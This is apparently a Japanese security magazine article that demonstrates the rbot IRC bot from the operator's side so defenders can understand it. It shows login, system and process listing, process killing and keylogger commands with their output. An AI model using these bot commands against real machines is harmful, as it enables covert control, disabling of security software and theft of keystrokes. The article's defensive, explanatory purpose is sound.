Articles - Malware |
rbotを使ってみる
ボットに関しては、前述したような「なにができるのか」だけを解説されても実際にどのような操作ができるのかはわかりにくい。敵を知ることが対策を練る上では重要な要素であるため、実際にコマンドを入力してどのような指令を下せるのかを見ていこう。
はじめにログインからシステム情報の閲覧、キーロガーの有効化までを行っているのが下図である。rbotでは基本的なコマンドは共通であるため、コマンドを入力してみれば、rbot系のボットであるかも検討がつく。また、rbotに限らず、ボットのコマンドは、ピリオドや!を頭につける。たとえば、ログインであれば「.login パスワード」や「!login」のように入力を行う。これはクラックツールではないIRCボットでも使われる。
図6は、ログインコマンドに続いて設定したパスワードを入力し、ボットにログインしているところだ(下図では、[HJ]-87745がボット名)。パスワードを間違えるとボットへログインすることができないため、ボットは一切の操作を受け付けない。
続いて図7は、システム情報の閲覧である。システムの基本情報やネットワーク情報などを表示しているが、プロセスに関しては閲覧だけでなくKILLもできるためセキュリティソフトなどの無効化が行われる可能性もある。
また、キーロガーは、有効化することで設定ファイルで指定したログファイルがターゲットのコンピュータ上に保存されるとともに、指定したチャンネルにリアルタイムで出力も行われる。アクティブウィンドウも記録されるため、どのアプリケーションで入力したキーのログであるかも検討がつく。
■図6:ボットへのログイン
.login hoge ←間違ったパスワード
-[HJ]-87745- Pass auth failed (k0rnz!korn[at]foo.com).
-[HJ]-87745- Your attempt has been logged.
.login 123123 ←正しいパスワード
<[HJ]-87745> [MAIN]: Password accepted. ←ログインOK
■図7:システム情報の閲覧
.sysinfo ←システムの基本情報の閲覧
<[HJ]-87745> [SYSINFO]: [CPU]: 2333MHz. [RAM]: 261,616KB total, 261,616KB free. [Disk]: 8,377,864KB total, 5,768,964KB free. [OS]: Windows XP (Service Pack 2) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: user-073709aee2 (192.168.1.145). [Current User]: user. [Date]: 21:Mar:2006. [Time]: 22:09:18. [Uptime]: 0d 2h 2m.
.netinfo ←ネットワーク情報の閲覧
<[HJ]-87745> [NETINFO]: [Type]: LAN (LAN 接続). [IP Address]: 192.168.1.145. [Hostname]: 192.168.1.145.
.driveinfo ←ストレージ情報の閲覧
<[HJ]-87745> [MAIN]: Disk Drive (C:\): 8,377,864KB total, 5,768,964KB free, 5,768,964KB available.
<[HJ]-87745> [MAIN]: Cdrom Drive (D:\): Failed to stat, device not ready.
.version ←ボットのバージョンを確認
<[HJ]-87745> [MAIN]: [Urx BoT]
.procs ←プロセスの閲覧
<[HJ]-87745> [PROC]: Listing processes:
<[HJ]-87745> System (4)
<[HJ]-87745> smss.exe (540)
<[HJ]-87745> csrss.exe (604)
<[HJ]-87745> winlogon.exe (628)
<[HJ]-87745> services.exe (672)
<[HJ]-87745> lsass.exe (684)
<[HJ]-87745> svchost.exe (844)
<[HJ]-87745> cmd.exe (272)
~~~~省略~~~~
.kill 272 ←プロセスのKILL
<[HJ]-87745> [PROC]: Process killed ID: 272
■図8:キーロガー機能を有効にすると、設定ファイルで指定した出力チャンネルにオンラインでキーログが表示される。
.keylog on ←キーロガー機能を有効にする
<[HJ]-87745> [KEYLOG]: Key logger active. ←以下、チャンネルにログが出力されていく
<[HJ]-87745> [KEYLOG]: (Changed Windows: Program Manager)
<[HJ]-87745> [KEYLOG]: (Changed Windows: )
<[HJ]-87745> [KEYLOG]: (Changed Windows: コマンド プロンプト)
<[HJ]-87745> [KEYLOG]: netstat -an (Return) (コマンド プロンプト - netstat -an)
<[HJ]-87745> [KEYLOG]: (Changed Windows: )
■図9:キーログはターゲットのコンピュータ上にも保存されるので、後でログをダウンロードすることも可能。